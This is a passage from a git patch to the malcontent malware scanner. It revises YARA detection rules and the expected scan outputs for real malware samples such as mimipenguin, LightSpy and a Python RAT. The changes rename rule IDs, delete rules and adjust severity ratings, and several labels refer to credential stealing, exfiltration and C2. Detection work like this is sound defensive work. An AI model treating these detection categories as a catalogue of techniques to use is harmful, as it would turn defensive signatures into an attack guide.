[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.s3](https://%s.s3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s/account.json](https://%s/account.json)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%sSCRAM](https://%sSCRAM) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[announce_port](https://github.com/search?q=announce_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[m_ip](https://github.com/search?q=m_ip&type=code)
[miss_port](https://github.com/search?q=miss_port&type=code)
[nIp](https://github.com/search?q=nIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[old_ip](https://github.com/search?q=old_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pages_ip](https://github.com/search?q=pages_ip&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[privateIp](https://github.com/search?q=privateIp&type=code)
[relay_port](https://github.com/search?q=relay_port&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[routedPort](https://github.com/search?q=routedPort&type=code)
[snmp_port](https://github.com/search?q=snmp_port&type=code)
[snmpd_port](https://github.com/search?q=snmpd_port&type=code)
[stripPort](https://github.com/search?q=stripPort&type=code)
[tIp](https://github.com/search?q=tIp&type=code)
[vIp](https://github.com/search?q=vIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [ConnectServer](https://github.com/search?q=ConnectServer&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [UnarchiveProject](https://github.com/search?q=UnarchiveProject&type=code)
[unarchiveadmin](https://github.com/search?q=unarchiveadmin&type=code)
[unarchiveapp_configurations](https://github.com/search?q=unarchiveapp_configurations&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | @@ -114,7 +115,7 @@ | LOW | [discover/cloud/aws_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/aws-metadata.yara#aws_metadata) | References the AWS EC2 metadata token | [X-aws-ec2-metadata-token](https://github.com/search?q=X-aws-ec2-metadata-token&type=code) | | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) | | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | diff --git a/tests/linux/mimipenguin/python/mimipenguin.simple b/tests/linux/mimipenguin/python/mimipenguin.simple index 9e1275d11..ea0e3b51a 100644 --- a/tests/linux/mimipenguin/python/mimipenguin.simple +++ b/tests/linux/mimipenguin/python/mimipenguin.simple @@ -7,7 +7,7 @@ credential/password/finder: high credential/ssh/d: medium data/base64/decode: medium data/encoding/base64: low -discover/process/name_get: medium +discover/process/name: medium discover/processes/list: medium discover/system/platform: medium exfil/stealer/password: critical diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple index 913a536eb..292c43b62 100644 --- a/tests/macOS/2024.LightSpy/dropper.simple +++ b/tests/macOS/2024.LightSpy/dropper.simple @@ -6,7 +6,7 @@ c2/tool_transfer/macos: critical crypto/aes: low crypto/xor: high data/hash/md5: medium -discover/process/name_get: medium +discover/process/name: medium discover/system/cpu_info: low discover/system/network: high discover/system/platform: medium diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 939d68075..29b2837f7 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -7,6 +7,7 @@ | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| -LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | ## Added: ls [🔵 LOW] diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 9e0e93a9c..be1dfc59f 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 9e0e93a9c..be1dfc59f 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/npm/2024.testerrrrrrrrrr/init.js.simple b/tests/npm/2024.testerrrrrrrrrr/init.js.simple index 2f6a2655a..7544cae26 100644 --- a/tests/npm/2024.testerrrrrrrrrr/init.js.simple +++ b/tests/npm/2024.testerrrrrrrrrr/init.js.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/js: critical anti-static/obfuscation/python: critical -c2/server_address: medium +c2/addr/server: medium discover/network/interface_list: medium exec/shell/exec: medium exfil/nodejs: critical diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple index a382541db..110a2dbd1 100644 --- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple +++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple @@ -2,10 +2,11 @@ c2/tool_transfer/python: critical discover/ip/public: high discover/network/interface_list: medium -discover/system/network: high +discover/system/network: medium discover/system/platform: medium discover/user/name_get: high -evasion/file/prefix: high +evasion/file/prefix: medium +evasion/file/prefix/tmp: high exec/cmd/pipe: medium exec/program: medium exec/shell/command: medium diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple index fe9eedbe5..5ddebac73 100644 --- a/tests/python/2024.Custom.RAT/output.py.simple +++ b/tests/python/2024.Custom.RAT/output.py.simple @@ -15,7 +15,7 @@ data/encoding/json_decode: low discover/ip/geo: high discover/ip/public: high discover/network/interface_list: medium -discover/process/name_get: medium +discover/process/name: medium discover/system/network: high discover/system/platform: medium discover/system/sysinfo: medium diff --git a/tests/python/clean/hatch/migrate.py.simple b/tests/python/clean/hatch/migrate.py.simple index 06847576f..d3dd6534c 100644 --- a/tests/python/clean/hatch/migrate.py.simple +++ b/tests/python/clean/hatch/migrate.py.simple @@ -2,10 +2,10 @@ discover/system/environment: medium exec/program: medium exec/remote_commands/code_eval: medium +false-positives/py_hatch: low fs/directory/list: low fs/file/open: low fs/symlink_resolve: low -impact/remote_access/py_setuptools: medium net/download: medium os/fd/read: low os/fd/write: low diff --git a/tests/python/clean/numba/support.py.simple b/tests/python/clean/numba/support.py.simple index ee2f6a10e..fd144277a 100644 --- a/tests/python/clean/numba/support.py.simple +++ b/tests/python/clean/numba/support.py.simple @@ -2,6 +2,7 @@ discover/system/platform: medium exec/program: medium exec/remote_commands/code_eval: medium +false-positives/setuptools: low fs/directory/create: low fs/directory/list: low fs/file/open: low @@ -9,7 +10,6 @@ fs/file/read: low fs/file/write: low fs/tempdir: low fs/tempdir/create: low -impact/remote_access/py_setuptools: low net/url/embedded: low os/fd/read: low os/fd/write: low diff --git a/tests/python/clean/setuptools/namespaces.py.simple b/tests/python/clean/setuptools/namespaces.py.simple index 4f93d1dee..43cd5497f 100644 --- a/tests/python/clean/setuptools/namespaces.py.simple +++ b/tests/python/clean/setuptools/namespaces.py.simple @@ -2,5 +2,5 @@ data/encoding/json_encode: low exec/remote_commands/code_eval: medium exec/shell/command: medium +false-positives/setuptools: low fs/directory/create: low -impact/remote_access/py_setuptools: low diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index d6c10054b..13c24270f 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -9,6 +9,7 @@ data/compression/lzma: low data/embedded/app_manifest: medium data/encoding/base64: low discover/system/sysinfo: medium +evasion/process_injection/ptrace: low exec/program: medium exec/tty/getpass: low exfil/stealer/python: critical From ac9125e60457dd7d008cfdef9cb8620df27f2e2b Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sun, 10 Nov 2024 08:37:12 -0500 Subject: [PATCH 4/7] further rule tuning --- pkg/action/testdata/scan_archive | 1 - rules/c2/addr/url.yara | 2 +- .../process/effective-groupid-get.yara | 27 --- .../process/effective-userid-get.yara | 12 -- rules/discover/process/limit-get.yara | 13 -- rules/discover/process/pid-get.yara | 13 -- rules/discover/process/priority-get.yara | 11 - rules/discover/process/userid-get.yara | 12 -- .../process/working_directory-get.yara | 24 --- rules/evasion/process_injection/ptrace.yara | 2 +- rules/hw/dev/ubi.yara | 2 +- ...4796BB27126E03A7E25DD5D589.cache.js.simple | 2 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 2 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- .../wyoming-xray-undress-robert.simple | 1 - tests/linux/2024.kubo_injector/injector.json | 11 - tests/linux/2024.sbcl.market/sbcl.sdiff | 1 - tests/linux/clean/ld-2.27.so.simple | 1 - tests/linux/clean/libgcj.so.17.0.0.simple | 1 - tests/linux/clean/libgcj.so.17.simple | 1 - tests/linux/clean/ls.x86_64.md | 1 - tests/linux/clean/lslogins.md | 1 - tests/linux/clean/pandoc.md | 3 +- tests/linux/clean/qemu-system-xtensa.md | 191 +++++++++--------- tests/linux/clean/redis-server.aarch64.md | 97 +++++---- tests/linux/clean/tracer.o.aarch64.simple | 1 - tests/linux/clean/trivy.simple | 1 - tests/macOS/clean/ls.mdiff | 1 - tests/macOS/clean/ls.sdiff.trigger_2 | 1 - tests/macOS/clean/ls.sdiff.trigger_3 | 1 - tests/php/2024.sagsooz/2024.php.simple | 2 +- .../python/2021.DiscordSafety/setup.py.simple | 2 +- tests/python/clean/numpy/misc_util.py.simple | 1 - .../clean/versioneer/versioneer.py.simple | 1 - .../windows/2024.aspdasdksa2/creal.exe.simple | 1 - 37 files changed, 154 insertions(+), 296 deletions(-) delete mode 100644 rules/discover/process/effective-groupid-get.yara delete mode 100644 rules/discover/process/effective-userid-get.yara delete mode 100644 rules/discover/process/limit-get.yara delete mode 100644 rules/discover/process/pid-get.yara delete mode 100644 rules/discover/process/priority-get.yara delete mode 100644 rules/discover/process/userid-get.yara delete mode 100644 rules/discover/process/working_directory-get.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 10a7a0e46..25eb1da4c 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -34,7 +34,6 @@ discover/user/name_get: medium evasion/bypass_security/linux/se: medium evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium -evasion/process_injection/ptrace: low exec/plugin: low exec/program: medium exec/shell/background_sleep: medium diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index 9a05c77c9..430344def 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara @@ -64,7 +64,7 @@ rule binary_php_url_with_question: high { filesize < 150MB and elf_or_macho and $ref } -rule script_php_url_with_question: medium { +rule script_php_url_with_question: high { meta: description = "contains hardcoded endpoint with a question mark" diff --git a/rules/discover/process/effective-groupid-get.yara b/rules/discover/process/effective-groupid-get.yara deleted file mode 100644 index 65139d4ed..000000000 --- a/rules/discover/process/effective-groupid-get.yara +++ /dev/null @@ -1,27 +0,0 @@ -rule getegid: harmless { - meta: - syscall = "getegid" - description = "returns the effective group id of the current process" - - strings: - $getuid = "getegid" fullword - $Getuid = "Getegid" fullword - - condition: - any of them -} - -rule php_getmygid: medium { - meta: - syscall = "getegid" - description = "returns the effective group id of the current process" - hash_2023_0xShell_0xShellori = "506e12e4ce1359ffab46038c4bf83d3ab443b7c5db0d5c8f3ad05340cb09c38e" - hash_2023_0xShell_root = "3baa3bfaa6ed78e853828f147c3747d818590faee5eecef67748209dd3d92afb" - hash_2023_0xShell_wesoori = "bab1040a9e569d7bf693ac907948a09323c5f7e7005012f7b75b5c1b2ced10ad" - - strings: - $getmygid = "getmygid" - - condition: - any of them -} diff --git a/rules/discover/process/effective-userid-get.yara b/rules/discover/process/effective-userid-get.yara deleted file mode 100644 index e3baa0a8c..000000000 --- a/rules/discover/process/effective-userid-get.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule geteuid: harmless { - meta: - syscall = "geteuid" - description = "returns the effective user id of the current process" - - strings: - $getuid = "geteuid" fullword - $Getuid = "Geteuid" fullword - - condition: - any of them -} diff --git a/rules/discover/process/limit-get.yara b/rules/discover/process/limit-get.yara deleted file mode 100644 index 80f6c2193..000000000 --- a/rules/discover/process/limit-get.yara +++ /dev/null @@ -1,13 +0,0 @@ -rule getrlimit: harmless { - meta: - syscall = "getrlimit" - description = "retrieve resource limits" - pledge = "id" - - strings: - $ref = "getrlimit" fullword - $go = "Getrlimit" fullword - - condition: - any of them -} diff --git a/rules/discover/process/pid-get.yara b/rules/discover/process/pid-get.yara deleted file mode 100644 index 5c2b72256..000000000 --- a/rules/discover/process/pid-get.yara +++ /dev/null @@ -1,13 +0,0 @@ -rule getpid: harmless { - meta: - syscall = "getpid" - description = "gets the active process ID" - - strings: - $ref = "getpid" fullword - $Getpid = "Getpid" fullword - $procID = "processID" fullword - - condition: - any of them -} diff --git a/rules/discover/process/priority-get.yara b/rules/discover/process/priority-get.yara deleted file mode 100644 index 722ac201e..000000000 --- a/rules/discover/process/priority-get.yara +++ /dev/null @@ -1,11 +0,0 @@ -rule getpriority: harmless { - meta: - syscall = "getpriority" - pledge = "proc" - - strings: - $ref = "getpriority" fullword - - condition: - any of them -} diff --git a/rules/discover/process/userid-get.yara b/rules/discover/process/userid-get.yara deleted file mode 100644 index ca7fa609b..000000000 --- a/rules/discover/process/userid-get.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule getuid: harmless { - meta: - syscall = "getuid" - description = "returns the user id of the current process" - - strings: - $getuid = "getuid" fullword - $Getuid = "Getuid" fullword - - condition: - any of them -} diff --git a/rules/discover/process/working_directory-get.yara b/rules/discover/process/working_directory-get.yara deleted file mode 100644 index 32276c274..000000000 --- a/rules/discover/process/working_directory-get.yara +++ /dev/null @@ -1,24 +0,0 @@ -rule getcwd: harmless { - meta: - pledge = "rpath" - syscall = "getcwd" - - strings: - $getcwd = "getcwd" fullword - - condition: - any of them -} - -rule getwd: harmless { - meta: - pledge = "rpath" - syscall = "getwd" - - strings: - $getwd = "getwd" fullword - $go_Getwd = "Getwd" fullword - - condition: - any of them -} diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara index 50ad34eec..a43eab298 100644 --- a/rules/evasion/process_injection/ptrace.yara +++ b/rules/evasion/process_injection/ptrace.yara @@ -42,5 +42,5 @@ rule known_ptrace_injectors: override { $not_bpf = "BPF" fullword condition: - any of them + ptrace and any of them } diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara index 6756140a9..11af74d4f 100644 --- a/rules/hw/dev/ubi.yara +++ b/rules/hw/dev/ubi.yara @@ -21,5 +21,5 @@ rule expected_ubi_users: override { $UBI = "UBI version" condition: - filesize < 512KB and any of them + filesize < 512KB and ubi and any of them } diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index 8837659fb..2804b9123 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -20,7 +20,7 @@ data/encoding/json_encode: low data/encoding/reverse: low data/random/insecure: low discover/group/lookup: medium -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index b1504d031..698e87467 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -22,7 +22,7 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/group/lookup: medium -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index 17b967ce3..11134aafd 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -11,7 +11,7 @@ data/encoding/base64: low data/encoding/reverse: low data/hash/md5: low data/random/insecure: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 054657623..095b10183 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -11,7 +11,7 @@ data/encoding/base64: low data/encoding/reverse: low data/hash/md5: low data/random/insecure: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 3b7669d02..0b5239bd7 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -9,7 +9,7 @@ data/compression/gzip: low data/encoding/base64: low data/encoding/reverse: low data/random/insecure: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple index 457f20255..77a248d51 100644 --- a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple +++ b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple @@ -1,7 +1,6 @@ # linux/2024.Beast/wyoming-xray-undress-robert: critical fs/path/dev: medium fs/path/tmp: medium -hw/dev/ubi: low impact/ransom/linux: high impact/shutdown: medium lateral/vmware/vms: medium diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json index 6df73c88c..baa2a4b88 100644 --- a/tests/linux/2024.kubo_injector/injector.json +++ b/tests/linux/2024.kubo_injector/injector.json @@ -112,17 +112,6 @@ "ID": "fs/symlink_resolve", "RuleName": "realpath" }, - { - "Description": "expected ubi users", - "MatchStrings": [ - "Usage:" - ], - "RiskScore": 1, - "RiskLevel": "LOW", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users", - "ID": "hw/dev/ubi", - "RuleName": "expected_ubi_users" - }, { "Description": "Buffer overflow exploit", "MatchStrings": [ diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff index 502e9857c..a24fab7f3 100644 --- a/tests/linux/2024.sbcl.market/sbcl.sdiff +++ b/tests/linux/2024.sbcl.market/sbcl.sdiff @@ -17,7 +17,6 @@ -fs/permission/modify -fs/proc/self_exe -fs/symlink_resolve --hw/dev/ubi -net/url/embedded ++++ added: sbcl.dirty +anti-static/elf/entropy diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index 2b9e1489a..b73884649 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -11,7 +11,6 @@ fs/path/var_profile: medium fs/proc/self_exe: medium fs/proc/sys_kernel_osrelease: medium fs/tempdir: low -hw/dev/ubi: low net/url/embedded: low persist/shell/bash: medium sus/exclamation: medium diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple index 6fe699be2..3a05df73d 100644 --- a/tests/linux/clean/libgcj.so.17.0.0.simple +++ b/tests/linux/clean/libgcj.so.17.0.0.simple @@ -25,7 +25,6 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hijack_execution/LD_LIBRARY_PATH: low -evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/address_check: low diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple index 1ee600a0a..592fdca9a 100644 --- a/tests/linux/clean/libgcj.so.17.simple +++ b/tests/linux/clean/libgcj.so.17.simple @@ -25,7 +25,6 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hijack_execution/LD_LIBRARY_PATH: low -evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/address_check: low diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index ffd6be373..fe3d4731f 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -7,6 +7,5 @@ | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
